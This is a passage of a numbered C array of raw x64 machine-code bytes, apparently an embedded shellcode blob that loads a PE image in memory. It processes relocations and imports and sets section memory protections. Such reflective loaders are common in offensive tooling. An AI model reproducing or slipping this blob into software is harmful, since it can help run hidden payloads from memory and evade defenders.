1114 0x00, 0x0f, 0xb6, 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x3c, 0xa0, 0x75, 0x23,
1115 0x48, 0x8b, 0x85, 0x30, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x10, 0x48, 0x8b,
1116 0x85, 0x40, 0x04, 0x00, 0x00, 0x48, 0x01, 0xc2, 0x48, 0x8b, 0x85, 0x30,
1117 0x04, 0x00, 0x00, 0x48, 0x89, 0x10, 0xe9, 0xbb, 0x00, 0x00, 0x00, 0x48,
1118 0x8b, 0x85, 0xc0, 0x04, 0x00, 0x00, 0x0f, 0xb6, 0x40, 0x01, 0x83, 0xe0,
1119 0xf0, 0x3c, 0x30, 0x75, 0x25, 0x48, 0x8b, 0x85, 0x30, 0x04, 0x00, 0x00,
1120 0x48, 0x8b, 0x10, 0x48, 0x8b, 0x85, 0x40, 0x04, 0x00, 0x00, 0x89, 0xc0,
1121 0x48, 0x01, 0xc2, 0x48, 0x8b, 0x85, 0x30, 0x04, 0x00, 0x00, 0x48, 0x89,
1122 0x10, 0xe9, 0x84, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x04, 0x00,
1123 0x00, 0x0f, 0xb6, 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x3c, 0x10, 0x75, 0x27,
1124 0x48, 0x8b, 0x85, 0x30, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x10, 0x48, 0x8b,
1125 0x85, 0x40, 0x04, 0x00, 0x00, 0x48, 0xc1, 0xe8, 0x10, 0x0f, 0xb7, 0xc0,
1126 0x48, 0x01, 0xc2, 0x48, 0x8b, 0x85, 0x30, 0x04, 0x00, 0x00, 0x48, 0x89,
1127 0x10, 0xeb, 0x4b, 0x48, 0x8b, 0x85, 0xc0, 0x04, 0x00, 0x00, 0x0f, 0xb6,
1128 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x3c, 0x20, 0x75, 0x23, 0x48, 0x8b, 0x85,
1129 0x30, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x10, 0x48, 0x8b, 0x85, 0x40, 0x04,
1130 0x00, 0x00, 0x0f, 0xb7, 0xc0, 0x48, 0x01, 0xc2, 0x48, 0x8b, 0x85, 0x30,
1131 0x04, 0x00, 0x00, 0x48, 0x89, 0x10, 0xeb, 0x16, 0x48, 0x8b, 0x85, 0xc0,
1132 0x04, 0x00, 0x00, 0x0f, 0xb6, 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x84, 0xc0,
1133 0x0f, 0x85, 0x28, 0x0e, 0x00, 0x00, 0x48, 0x83, 0x85, 0xc0, 0x04, 0x00,
1134 0x00, 0x02, 0x48, 0x8b, 0x85, 0xb8, 0x04, 0x00, 0x00, 0x8b, 0x40, 0x04,
1135 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xb8, 0x04, 0x00, 0x00, 0x48, 0x01, 0xd0,
1136 0x48, 0x39, 0x85, 0xc0, 0x04, 0x00, 0x00, 0x0f, 0x85, 0x8a, 0xfe, 0xff,
1137 0xff, 0x48, 0x8b, 0x85, 0xc0, 0x04, 0x00, 0x00, 0x48, 0x89, 0x85, 0xb8,
1138 0x04, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x70, 0x8b, 0x8d, 0x3c, 0x04, 0x00,
1139 0x00, 0x8b, 0x95, 0x5c, 0x04, 0x00, 0x00, 0x48, 0x01, 0xca, 0x48, 0x01,
1140 0xd0, 0x48, 0x39, 0x85, 0xb8, 0x04, 0x00, 0x00, 0x73, 0x12, 0x48, 0x8b,
1141 0x85, 0xb8, 0x04, 0x00, 0x00, 0x8b, 0x40, 0x04, 0x85, 0xc0, 0x0f, 0x85,
1142 0x34, 0xfe, 0xff, 0xff, 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00, 0x00, 0x8b,
1143 0x80, 0x90, 0x00, 0x00, 0x00, 0x89, 0x85, 0x3c, 0x04, 0x00, 0x00, 0x83,
1144 0xbd, 0x3c, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x84, 0xaa, 0x01, 0x00, 0x00,
1145 0x8b, 0x95, 0x3c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x01,
1146 0xd0, 0x48, 0x89, 0x85, 0xd8, 0x04, 0x00, 0x00, 0xe9, 0x7f, 0x01, 0x00,
1147 0x00, 0x48, 0x8b, 0x85, 0xd8, 0x04, 0x00, 0x00, 0x8b, 0x40, 0x0c, 0x89,
1148 0xc2, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x28,
1149 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x28, 0x04, 0x00, 0x00, 0x48, 0x89,
1150 0xc2, 0x48, 0x8b, 0x8d, 0x10, 0x05, 0x00, 0x00, 0xe8, 0xe1, 0xd9, 0xff,
1151 0xff, 0x48, 0x89, 0x85, 0x20, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd8,
1152 0x04, 0x00, 0x00, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x70, 0x48,
1153 0x01, 0xd0, 0x48, 0x89, 0x85, 0xe8, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85,
1154 0xd8, 0x04, 0x00, 0x00, 0x8b, 0x40, 0x10, 0x89, 0xc2, 0x48, 0x8b, 0x45,
1155 0x70, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xe0, 0x04, 0x00, 0x00, 0x48,
1156 0x8b, 0x85, 0xe8, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x85, 0xc0,
1157 0x0f, 0x84, 0xf9, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8, 0x04, 0x00,
1158 0x00, 0x48, 0x8b, 0x00, 0x48, 0x85, 0xc0, 0x79, 0x3d, 0x48, 0x8b, 0x85,
1159 0xe8, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x85,
1160 0x20, 0x04, 0x00, 0x00, 0x41, 0x89, 0xd1, 0x41, 0xb8, 0x00, 0x00, 0x00,
1161 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x10, 0x05, 0x00, 0x00, 0xe8,
1162 0x56, 0xd6, 0xff, 0xff, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xe0, 0x04,
1163 0x00, 0x00, 0x48, 0x89, 0x10, 0xe9, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b,
1164 0x85, 0xe8, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x10, 0x48, 0x8b, 0x45, 0x70,
1165 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x18, 0x04, 0x00, 0x00, 0x48, 0x8b,
1166 0x85, 0x18, 0x05, 0x00, 0x00, 0x8b, 0x40, 0x04, 0x85, 0xc0, 0x74, 0x3b,
1167 0x48, 0x8b, 0x85, 0x18, 0x04, 0x00, 0x00, 0x48, 0x83, 0xc0, 0x02, 0x48,
1168 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x10, 0x05, 0x00, 0x00, 0xe8, 0x4d, 0x0d,
1169 0x00, 0x00, 0x85, 0xc0, 0x74, 0x1d, 0x48, 0x8b, 0x85, 0x10, 0x05, 0x00,
1170 0x00, 0x48, 0x8b, 0x80, 0xb8, 0x01, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48,
1171 0x8b, 0x85, 0xe0, 0x04, 0x00, 0x00, 0x48, 0x89, 0x10, 0xeb, 0x37, 0x48,
1172 0x8b, 0x85, 0x18, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x50, 0x02, 0x48, 0x8b,
1173 0x85, 0x20, 0x04, 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x49,
1174 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x10, 0x05, 0x00, 0x00,
1175 0xe8, 0xb9, 0xd5, 0xff, 0xff, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xe0,
1176 0x04, 0x00, 0x00, 0x48, 0x89, 0x10, 0x48, 0x83, 0x85, 0xe8, 0x04, 0x00,
1177 0x00, 0x08, 0x48, 0x83, 0x85, 0xe0, 0x04, 0x00, 0x00, 0x08, 0xe9, 0xf4,
1178 0xfe, 0xff, 0xff, 0x90, 0x48, 0x83, 0x85, 0xd8, 0x04, 0x00, 0x00, 0x14,
1179 0x48, 0x8b, 0x85, 0xd8, 0x04, 0x00, 0x00, 0x8b, 0x40, 0x0c, 0x85, 0xc0,
1180 0x0f, 0x85, 0x6f, 0xfe, 0xff, 0xff, 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00,
1181 0x00, 0x8b, 0x80, 0xf0, 0x00, 0x00, 0x00, 0x89, 0x85, 0x3c, 0x04, 0x00,
1182 0x00, 0x83, 0xbd, 0x3c, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x70, 0x01,
1183 0x00, 0x00, 0x8b, 0x95, 0x3c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x70,
1184 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xd0, 0x04, 0x00, 0x00, 0xe9, 0x45,
1185 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd0, 0x04, 0x00, 0x00, 0x8b, 0x40,
1186 0x04, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x01, 0xd0, 0x48, 0x89,
1187 0x85, 0x28, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x28, 0x04, 0x00, 0x00,
1188 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x10, 0x05, 0x00, 0x00, 0xe8, 0x17,
1189 0xd8, 0xff, 0xff, 0x48, 0x89, 0x85, 0x20, 0x04, 0x00, 0x00, 0x48, 0x83,
1190 0xbd, 0x20, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x84, 0xf4, 0x00, 0x00, 0x00,
1191 0x48, 0x8b, 0x85, 0xd0, 0x04, 0x00, 0x00, 0x8b, 0x40, 0x10, 0x89, 0xc2,
1192 0x48, 0x8b, 0x45, 0x70, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xe8, 0x04,
1193 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd0, 0x04, 0x00, 0x00, 0x8b, 0x40, 0x0c,
1194 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85,
1195 0xe0, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8, 0x04, 0x00, 0x00, 0x48,
1196 0x8b, 0x00, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xb0, 0x00, 0x00, 0x00, 0x48,
1197 0x8b, 0x85, 0xe8, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x85, 0xc0,
1198 0x79, 0x3a, 0x48, 0x8b, 0x85, 0xe8, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x00,
1199 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x20, 0x04, 0x00, 0x00, 0x41, 0x89, 0xd1,
1200 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d,
1201 0x10, 0x05, 0x00, 0x00, 0xe8, 0x7d, 0xd4, 0xff, 0xff, 0x48, 0x89, 0xc2,
1202 0x48, 0x8b, 0x85, 0xe0, 0x04, 0x00, 0x00, 0x48, 0x89, 0x10, 0xeb, 0x4f,
1203 0x48, 0x8b, 0x85, 0xe8, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x10, 0x48, 0x8b,
1204 0x45, 0x70, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x18, 0x04, 0x00, 0x00,
1205 0x48, 0x8b, 0x85, 0x18, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x50, 0x02, 0x48,
1206 0x8b, 0x85, 0x20, 0x04, 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00,
1207 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x10, 0x05, 0x00,
1208 0x00, 0xe8, 0x2c, 0xd4, 0xff, 0xff, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85,
1209 0xe0, 0x04, 0x00, 0x00, 0x48, 0x89, 0x10, 0x48, 0x83, 0x85, 0xe8, 0x04,
1210 0x00, 0x00, 0x08, 0x48, 0x83, 0x85, 0xe0, 0x04, 0x00, 0x00, 0x08, 0xe9,
1211 0x40, 0xff, 0xff, 0xff, 0x90, 0xeb, 0x01, 0x90, 0x48, 0x83, 0x85, 0xd0,
1212 0x04, 0x00, 0x00, 0x20, 0x48, 0x8b, 0x85, 0xd0, 0x04, 0x00, 0x00, 0x8b,
1213 0x40, 0x04, 0x85, 0xc0, 0x0f, 0x85, 0xa9, 0xfe, 0xff, 0xff, 0x48, 0x8b,
1214 0x85, 0x78, 0x04, 0x00, 0x00, 0x8b, 0x40, 0x28, 0x89, 0xc2, 0x48, 0x8b,
1215 0x45, 0x70, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x10, 0x04, 0x00, 0x00,
1216 0x48, 0x8b, 0x95, 0x78, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x85, 0xb0, 0x02,
1217 0x00, 0x00, 0x49, 0x89, 0xd0, 0xba, 0x21, 0x00, 0x00, 0x00, 0x48, 0x89,
1218 0xc7, 0x4c, 0x89, 0xc6, 0x48, 0x89, 0xd1, 0xf3, 0x48, 0xa5, 0x48, 0xc7,
1219 0x85, 0xb8, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0f, 0xb7, 0x85,
1220 0xb6, 0x02, 0x00, 0x00, 0x0f, 0xb7, 0xd0, 0x48, 0x89, 0xd0, 0x48, 0xc1,
1221 0xe0, 0x02, 0x48, 0x01, 0xd0, 0x48, 0xc1, 0xe0, 0x03, 0x48, 0x89, 0x45,
1222 0x58, 0x48, 0x8d, 0x4d, 0x58, 0x48, 0x8d, 0x85, 0xb8, 0x03, 0x00, 0x00,
1223 0x48, 0x8b, 0x95, 0x90, 0x04, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x30,
1224 0xc7, 0x44, 0x24, 0x28, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x20,
1225 0x00, 0x30, 0x00, 0x00, 0x49, 0x89, 0xc9, 0x41, 0xb8, 0x00, 0x00, 0x00,
1226 0x00, 0x48, 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8,
1227 0x9f, 0x33, 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00, 0x00, 0x83, 0xbd,
1228 0x54, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x88, 0x5c, 0x0a, 0x00, 0x00, 0x0f,
1229 0xb7, 0x85, 0xb6, 0x02, 0x00, 0x00, 0x0f, 0xb7, 0xd0, 0x89, 0xd0, 0xc1,
1230 0xe0, 0x02, 0x01, 0xd0, 0xc1, 0xe0, 0x03, 0x89, 0xc1, 0x48, 0x8b, 0x85,
1231 0xb8, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x48, 0x04, 0x00, 0x00, 0x41,
1232 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0x46, 0x2b, 0x00, 0x00, 0x48, 0x8b,
1233 0x85, 0x10, 0x05, 0x00, 0x00, 0x8b, 0x80, 0x48, 0x05, 0x00, 0x00, 0x83,
1234 0xf8, 0x01, 0x75, 0x73, 0x48, 0x8b, 0x85, 0x10, 0x05, 0x00, 0x00, 0x0f,
1235 0xb6, 0x80, 0xfb, 0x05, 0x00, 0x00, 0x84, 0xc0, 0x75, 0x41, 0x48, 0x8b,
1236 0x85, 0x78, 0x04, 0x00, 0x00, 0x8b, 0x50, 0x54, 0x48, 0x8b, 0x45, 0x70,
1237 0x41, 0x89, 0xd0, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8,
1238 0xc0, 0x2a, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00, 0x00, 0x8b,
1239 0x50, 0x54, 0x48, 0x8b, 0x85, 0x88, 0x04, 0x00, 0x00, 0x41, 0x89, 0xd0,
1240 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x9f, 0x2a, 0x00,
1241 0x00, 0xeb, 0x20, 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00, 0x00, 0x8b, 0x48,
1242 0x54, 0x48, 0x8b, 0x55, 0x70, 0x48, 0x8b, 0x85, 0x88, 0x04, 0x00, 0x00,
1243 0x41, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0xc1, 0x2a, 0x00, 0x00, 0x48,
1244 0x8b, 0x85, 0x10, 0x05, 0x00, 0x00, 0x0f, 0xb6, 0x80, 0xfb, 0x05, 0x00,
1245 0x00, 0x84, 0xc0, 0x0f, 0x85, 0xbe, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45,
1246 0x70, 0x48, 0x8b, 0x95, 0x90, 0x04, 0x00, 0x00, 0x49, 0x89, 0xd0, 0x48,
1247 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xa7, 0x31,
1248 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00, 0x00, 0x83, 0xbd, 0x54, 0x04,
1249 0x00, 0x00, 0x00, 0x0f, 0x88, 0x65, 0x09, 0x00, 0x00, 0x83, 0xbd, 0x58,
1250 0x04, 0x00, 0x00, 0x00, 0x74, 0x08, 0x48, 0xc7, 0x45, 0x70, 0x00, 0x00,
1251 0x00, 0x00, 0x48, 0xc7, 0x45, 0x68, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
1252 0x85, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0x70, 0x48, 0x8b, 0x95,
1253 0x90, 0x04, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x50, 0xc7, 0x44, 0x24,
1254 0x48, 0x80, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x40, 0x00, 0x00, 0x00,
1255 0x00, 0xc7, 0x44, 0x24, 0x38, 0x02, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55,
1256 0x68, 0x48, 0x89, 0x54, 0x24, 0x30, 0x48, 0xc7, 0x44, 0x24, 0x28, 0x00,
1257 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00,
1258 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48, 0xc7, 0xc2,
1259 0xff, 0xff, 0xff, 0xff, 0x48, 0x89, 0xc1, 0xe8, 0xed, 0x30, 0x00, 0x00,
1260 0x89, 0x85, 0x54, 0x04, 0x00, 0x00, 0x83, 0xbd, 0x54, 0x04, 0x00, 0x00,
1261 0x00, 0x0f, 0x88, 0xda, 0x08, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0x68, 0x48,
1262 0x8d, 0x45, 0x70, 0x48, 0x8b, 0x95, 0x90, 0x04, 0x00, 0x00, 0x48, 0x89,
1263 0x54, 0x24, 0x28, 0x48, 0x8d, 0x95, 0x8c, 0x00, 0x00, 0x00, 0x48, 0x89,
1264 0x54, 0x24, 0x20, 0x41, 0xb9, 0x08, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc8,
1265 0x48, 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x76,
1266 0x31, 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00, 0x00, 0x83, 0xbd, 0x54,
1267 0x04, 0x00, 0x00, 0x00, 0x0f, 0x88, 0x92, 0x08, 0x00, 0x00, 0xc7, 0x85,
1268 0xac, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x10, 0x03, 0x00,
1269 0x00, 0x48, 0x8b, 0x8d, 0xb8, 0x03, 0x00, 0x00, 0x8b, 0x95, 0xac, 0x04,
1270 0x00, 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0,
1271 0x48, 0xc1, 0xe0, 0x03, 0x48, 0x01, 0xc8, 0x8b, 0x40, 0x24, 0xc1, 0xe8,
1272 0x1e, 0x83, 0xe0, 0x01, 0x89, 0x85, 0xd4, 0x03, 0x00, 0x00, 0x48, 0x8b,
1273 0x8d, 0xb8, 0x03, 0x00, 0x00, 0x8b, 0x95, 0xac, 0x04, 0x00, 0x00, 0x48,
1274 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0, 0x48, 0xc1, 0xe0,
1275 0x03, 0x48, 0x01, 0xc8, 0x8b, 0x40, 0x24, 0xc1, 0xe8, 0x1f, 0x89, 0x85,
1276 0xd0, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0xb8, 0x03, 0x00, 0x00, 0x8b,
1277 0x95, 0xac, 0x04, 0x00, 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02,
1278 0x48, 0x01, 0xd0, 0x48, 0xc1, 0xe0, 0x03, 0x48, 0x01, 0xc8, 0x8b, 0x40,
1279 0x24, 0xc1, 0xe8, 0x1d, 0x83, 0xe0, 0x01, 0x89, 0x85, 0xcc, 0x03, 0x00,
1280 0x00, 0x83, 0xbd, 0xd0, 0x03, 0x00, 0x00, 0x00, 0x74, 0x18, 0x83, 0xbd,
1281 0xcc, 0x03, 0x00, 0x00, 0x00, 0x74, 0x0f, 0xc7, 0x85, 0xa4, 0x04, 0x00,
1282 0x00, 0x80, 0x00, 0x00, 0x00, 0xe9, 0x06, 0x01, 0x00, 0x00, 0x83, 0xbd,
1283 0xd4, 0x03, 0x00, 0x00, 0x00, 0x74, 0x18, 0x83, 0xbd, 0xcc, 0x03, 0x00,
1284 0x00, 0x00, 0x74, 0x0f, 0xc7, 0x85, 0xa4, 0x04, 0x00, 0x00, 0x20, 0x00,
1285 0x00, 0x00, 0xe9, 0xe5, 0x00, 0x00, 0x00, 0x83, 0xbd, 0xd4, 0x03, 0x00,
1286 0x00, 0x00, 0x74, 0x42, 0x83, 0xbd, 0xd0, 0x03, 0x00, 0x00, 0x00, 0x74,
1287 0x39, 0x83, 0xbd, 0xcc, 0x03, 0x00, 0x00, 0x00, 0x75, 0x30, 0x48, 0x8b,
1288 0x85, 0x10, 0x05, 0x00, 0x00, 0x0f, 0xb6, 0x80, 0xfb, 0x05, 0x00, 0x00,
1289 0x84, 0xc0, 0x75, 0x0f, 0xc7, 0x85, 0xa4, 0x04, 0x00, 0x00, 0x08, 0x00,
1290 0x00, 0x00, 0xe9, 0xa9, 0x00, 0x00, 0x00, 0xc7, 0x85, 0xa4, 0x04, 0x00,
1291 0x00, 0x04, 0x00, 0x00, 0x00, 0xe9, 0x9a, 0x00, 0x00, 0x00, 0x83, 0xbd,
1292 0xd4, 0x03, 0x00, 0x00, 0x00, 0x75, 0x1e, 0x83, 0xbd, 0xd0, 0x03, 0x00,
1293 0x00, 0x00, 0x75, 0x15, 0x83, 0xbd, 0xcc, 0x03, 0x00, 0x00, 0x00, 0x74,
1294 0x0c, 0xc7, 0x85, 0xa4, 0x04, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0xeb,
1295 0x73, 0x83, 0xbd, 0xd4, 0x03, 0x00, 0x00, 0x00, 0x74, 0x1e, 0x83, 0xbd,
1296 0xd0, 0x03, 0x00, 0x00, 0x00, 0x75, 0x15, 0x83, 0xbd, 0xcc, 0x03, 0x00,
1297 0x00, 0x00, 0x75, 0x0c, 0xc7, 0x85, 0xa4, 0x04, 0x00, 0x00, 0x02, 0x00,
1298 0x00, 0x00, 0xeb, 0x4c, 0x83, 0xbd, 0xd4, 0x03, 0x00, 0x00, 0x00, 0x75,
1299 0x1e, 0x83, 0xbd, 0xd0, 0x03, 0x00, 0x00, 0x00, 0x75, 0x15, 0x83, 0xbd,
1300 0xcc, 0x03, 0x00, 0x00, 0x00, 0x75, 0x0c, 0xc7, 0x85, 0xa4, 0x04, 0x00,
1301 0x00, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x25, 0x83, 0xbd, 0xd4, 0x03, 0x00,
1302 0x00, 0x00, 0x75, 0x1c, 0x83, 0xbd, 0xd0, 0x03, 0x00, 0x00, 0x00, 0x74,
1303 0x13, 0x83, 0xbd, 0xcc, 0x03, 0x00, 0x00, 0x00, 0x75, 0x0a, 0xc7, 0x85,
1304 0xa4, 0x04, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0xb8,
1305 0x03, 0x00, 0x00, 0x8b, 0x95, 0xac, 0x04, 0x00, 0x00, 0x48, 0x89, 0xd0,
1306 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0, 0x48, 0xc1, 0xe0, 0x03, 0x48,
1307 0x01, 0xc8, 0x8b, 0x40, 0x24, 0x25, 0x00, 0x00, 0x00, 0x04, 0x85, 0xc0,
1308 0x74, 0x0a, 0x81, 0x8d, 0xa4, 0x04, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00,
1309 0x48, 0x8b, 0x4d, 0x70, 0x4c, 0x8b, 0x85, 0xb8, 0x03, 0x00, 0x00, 0x8b,
1310 0x95, 0xac, 0x04, 0x00, 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02,
1311 0x48, 0x01, 0xd0, 0x48, 0xc1, 0xe0, 0x03, 0x4c, 0x01, 0xc0, 0x8b, 0x40,
1312 0x0c, 0x89, 0xc0, 0x48, 0x01, 0xc8, 0x48, 0x89, 0x85, 0x98, 0x00, 0x00,
1313 0x00, 0x0f, 0xb7, 0x85, 0xb6, 0x02, 0x00, 0x00, 0x0f, 0xb7, 0xc0, 0x83,
1314 0xe8, 0x01, 0x39, 0x85, 0xac, 0x04, 0x00, 0x00, 0x73, 0x5b, 0x48, 0x8b,
1315 0x95, 0xb8, 0x03, 0x00, 0x00, 0x8b, 0x85, 0xac, 0x04, 0x00, 0x00, 0x83,
1316 0xc0, 0x01, 0x89, 0xc1, 0x48, 0x89, 0xc8, 0x48, 0xc1, 0xe0, 0x02, 0x48,
1317 0x01, 0xc8, 0x48, 0xc1, 0xe0, 0x03, 0x48, 0x01, 0xd0, 0x8b, 0x40, 0x0c,
1318 0x41, 0x89, 0xc0, 0x48, 0x8b, 0x8d, 0xb8, 0x03, 0x00, 0x00, 0x8b, 0x95,
1319 0xac, 0x04, 0x00, 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48,
1320 0x01, 0xd0, 0x48, 0xc1, 0xe0, 0x03, 0x48, 0x01, 0xc8, 0x8b, 0x40, 0x0c,
1321 0x89, 0xc2, 0x4c, 0x89, 0xc0, 0x48, 0x29, 0xd0, 0x48, 0x89, 0x85, 0x90,
1322 0x00, 0x00, 0x00, 0xeb, 0x2a, 0x48, 0x8b, 0x8d, 0xb8, 0x03, 0x00, 0x00,
1323 0x8b, 0x95, 0xac, 0x04, 0x00, 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0,
1324 0x02, 0x48, 0x01, 0xd0, 0x48, 0xc1, 0xe0, 0x03, 0x48, 0x01, 0xc8, 0x8b,
1325 0x40, 0x10, 0x89, 0xc0, 0x48, 0x89, 0x85, 0x90, 0x00, 0x00, 0x00, 0xc7,
1326 0x85, 0x8c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x44, 0x8b, 0x85,
1327 0xa4, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x90, 0x00, 0x00, 0x00, 0x48,
1328 0x8d, 0x85, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x90, 0x04, 0x00,
1329 0x00, 0x48, 0x89, 0x54, 0x24, 0x28, 0x48, 0x8d, 0x95, 0x8c, 0x00, 0x00,
1330 0x00, 0x48, 0x89, 0x54, 0x24, 0x20, 0x45, 0x89, 0xc1, 0x49, 0x89, 0xc8,
1331 0x48, 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x5e,
1332 0x2e, 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00, 0x00, 0x83, 0xbd, 0x54,
1333 0x04, 0x00, 0x00, 0x00, 0x0f, 0x88, 0x7d, 0x05, 0x00, 0x00, 0x83, 0x85,
1334 0xac, 0x04, 0x00, 0x00, 0x01, 0x0f, 0xb7, 0x85, 0xb6, 0x02, 0x00, 0x00,
1335 0x0f, 0xb7, 0xc0, 0x39, 0x85, 0xac, 0x04, 0x00, 0x00, 0x0f, 0x82, 0xda,
1336 0xfc, 0xff, 0xff, 0xc7, 0x85, 0x8c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
1337 0x00, 0x8b, 0x85, 0xdc, 0x02, 0x00, 0x00, 0x89, 0xc0, 0x48, 0x89, 0x85,
1338 0x90, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x90, 0x00, 0x00, 0x00, 0x48,
1339 0x8d, 0x45, 0x70, 0x48, 0x8b, 0x95, 0x90, 0x04, 0x00, 0x00, 0x48, 0x89,
